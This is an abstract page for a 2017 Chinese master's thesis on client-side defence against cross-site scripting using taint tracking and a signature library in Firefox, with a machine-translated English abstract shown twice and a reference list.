跨站脚本攻击的检测防御技术研究
发布时间:2018-10-22 20:49
【摘要】:随着互联网技术的发展,Web应用也越来越广泛,基于B/S架构的各类网站和各种应用系统层出不穷。为了增强用户体验,主流网站充分利用了动态脚本语言,如Java Script语言。这种技术为用户带来便利的同时,大量的安全漏洞和威胁也随之而来。在当今的Web应用领域中,跨站脚本攻击是最严重、最常见的威胁之一。Web应用的安全机制的缺陷是该攻击存在的根源,没有对用户的输入进行足够的检查和过滤。虽然在服务器端可以通过修复Web应用,从根本性上解决该问题,但是由于安全补丁的更新速度较慢,以及系统运维人员安全意识的薄弱等原因,当遭受跨站攻击时,仍然不能及时修复Web应用中的漏洞,使用这些应用时会导致用户的操作处在高风险下。因此在遭受跨站脚本攻击时,为了提高用户的主动防御能力,研究用户客户端的跨站脚本攻击防御措施显得尤为重要。本文分析和探讨了目前常用的跨站脚本攻击的检测防御技术后,进行了如下两方面研究:(1)在深刻理解动态污点追踪,静态污点分析的基础上,提出一种以动态污点追踪为主,静态污点分析为辅的跨站脚本攻击检测防御方法,该方法首先对当前页面中的敏感信息进行标记,通过对当前页面中敏感信息传输过程的监测,当敏感信息有异常操作时,会向用户发出危险警告,并由用户来处理,实现对跨站脚本攻击的有效拦截。(2)针对已知常见的跨站脚本攻击特征可以直接检测的问题,引入跨站脚本攻击特征检测技术,提出了跨站脚本已知特征库。在对用户输入的信息进行静态污点分析之后,将分析结果中可疑污点源与跨站脚本已知的特征库作对比,对于存在于已知特征库中的污点信息直接进行过滤。而且结合污点判断的结果,可以不断更新已知特征库。该扩展的跨站脚本防御检测技术极大的提高了检测速度。在具体实现方法中,本文以开源的Mozilla Firefox作为实验平台。通过对该浏览器Java Script引擎的分析,扩展它各个阶段的处理过程。经实验验证,本文提出的检测防御方法是可行的。
[Abstract]:With the development of Internet technology, the application of Web is becoming more and more extensive, and various websites and application systems based on B / S architecture emerge endlessly. To enhance the user experience, mainstream websites make full use of dynamic scripting languages such as Java Script. This technology brings convenience to the user, at the same time, a large number of security vulnerabilities and threats also follow. In today's Web application field, cross-site scripting attack is the most serious and one of the most common threats. The flaw of the security mechanism of Web application is the root of the attack, and the user's input is not checked and filtered sufficiently. Although the problem can be fundamentally solved on the server side by fixing the Web application, due to the slow update speed of the security patches and the weak security awareness of the system operators, when they are subjected to cross-site attacks, There is still no time to fix vulnerabilities in Web applications, which can cause users to operate at high risk. Therefore, in order to improve the active defense ability of users, it is very important to study the defense measures of cross-site script attacks on users' clients when they are attacked by cross-site scripts. After analyzing and discussing the commonly used detection and defense technology of cross-station script attack, this paper makes the following two aspects of research: (1) based on the deep understanding of dynamic stain tracing and static stain analysis, a new method based on dynamic stain tracing is proposed. The method of cross-station script attack detection and defense supplemented by static stain analysis is used to mark sensitive information in the current page. By monitoring the process of transmission of sensitive information in the current page, when the sensitive information has abnormal operation, It will issue a danger warning to the user and be handled by the user to effectively intercept the cross-site script attack. (2) aiming at the problem that the known common cross-station script attack characteristics can be directly detected, the cross-station script attack feature detection technology is introduced. The known feature library of cross-station script is presented. After the static stain analysis of the information input by the user, the source of the suspicious stain in the analysis result is compared with the known feature library of the cross-station script, and the stain information that exists in the known feature library is filtered directly. And combined with the results of the stain judgment, you can constantly update the known feature library. The extended cross-site script defense detection technology greatly improves the detection speed. In the concrete implementation method, this paper takes the open source Mozilla Firefox as the experimental platform. Through the analysis of the browser Java Script engine, the processing process of each stage of the browser is extended. Experimental results show that the proposed method is feasible.
【学位授予单位】:兰州理工大学
【学位级别】:硕士
【学位授予年份】:2017
【分类号】:TP393.08
本文编号:2288270
[Abstract]:With the development of Internet technology, the application of Web is becoming more and more extensive, and various websites and application systems based on B / S architecture emerge endlessly. To enhance the user experience, mainstream websites make full use of dynamic scripting languages such as Java Script. This technology brings convenience to the user, at the same time, a large number of security vulnerabilities and threats also follow. In today's Web application field, cross-site scripting attack is the most serious and one of the most common threats. The flaw of the security mechanism of Web application is the root of the attack, and the user's input is not checked and filtered sufficiently. Although the problem can be fundamentally solved on the server side by fixing the Web application, due to the slow update speed of the security patches and the weak security awareness of the system operators, when they are subjected to cross-site attacks, There is still no time to fix vulnerabilities in Web applications, which can cause users to operate at high risk. Therefore, in order to improve the active defense ability of users, it is very important to study the defense measures of cross-site script attacks on users' clients when they are attacked by cross-site scripts. After analyzing and discussing the commonly used detection and defense technology of cross-station script attack, this paper makes the following two aspects of research: (1) based on the deep understanding of dynamic stain tracing and static stain analysis, a new method based on dynamic stain tracing is proposed. The method of cross-station script attack detection and defense supplemented by static stain analysis is used to mark sensitive information in the current page. By monitoring the process of transmission of sensitive information in the current page, when the sensitive information has abnormal operation, It will issue a danger warning to the user and be handled by the user to effectively intercept the cross-site script attack. (2) aiming at the problem that the known common cross-station script attack characteristics can be directly detected, the cross-station script attack feature detection technology is introduced. The known feature library of cross-station script is presented. After the static stain analysis of the information input by the user, the source of the suspicious stain in the analysis result is compared with the known feature library of the cross-station script, and the stain information that exists in the known feature library is filtered directly. And combined with the results of the stain judgment, you can constantly update the known feature library. The extended cross-site script defense detection technology greatly improves the detection speed. In the concrete implementation method, this paper takes the open source Mozilla Firefox as the experimental platform. Through the analysis of the browser Java Script engine, the processing process of each stage of the browser is extended. Experimental results show that the proposed method is feasible.
【学位授予单位】:兰州理工大学
【学位级别】:硕士
【学位授予年份】:2017
【分类号】:TP393.08
【参考文献】
相关期刊论文 前7条
1 李维峰;;基于平台的XSS攻击缓解技术[J];电脑编程技巧与维护;2017年05期
2 石颖;孙莹;;分布式拒绝服务攻击防御技术综述[J];计算机安全;2014年07期
3 周颖杰;焦程波;陈慧楠;马力;胡光岷;;基于流量行为特征的DoS&DDoS攻击检测与异常流识别[J];计算机应用;2013年10期
4 王夏莉;张玉清;;一种基于行为的XSS客户端防范方法[J];中国科学院研究生院学报;2011年05期
5 陈建青;张玉清;;Web跨站脚本漏洞检测工具的设计与实现[J];计算机工程;2010年06期
6 张洁;武装;陆倜;;一种改进的ARP协议欺骗检测方法[J];计算机科学;2008年03期
7 孙知信;任志广;杨熙;王成;;基于多层检测的网络安全防范系统[J];通信学报;2007年07期
相关硕士学位论文 前2条
1 曹文;基于哈希树匹配模型的跨站脚本攻击检测防御研究[D];江西师范大学;2013年
2 吴晓恒;跨站脚本攻击的防御技术研究[D];上海交通大学;2011年
,本文编号:2288270
本文链接:https://www.wllwen.com/guanlilunwen/ydhl/2288270.html
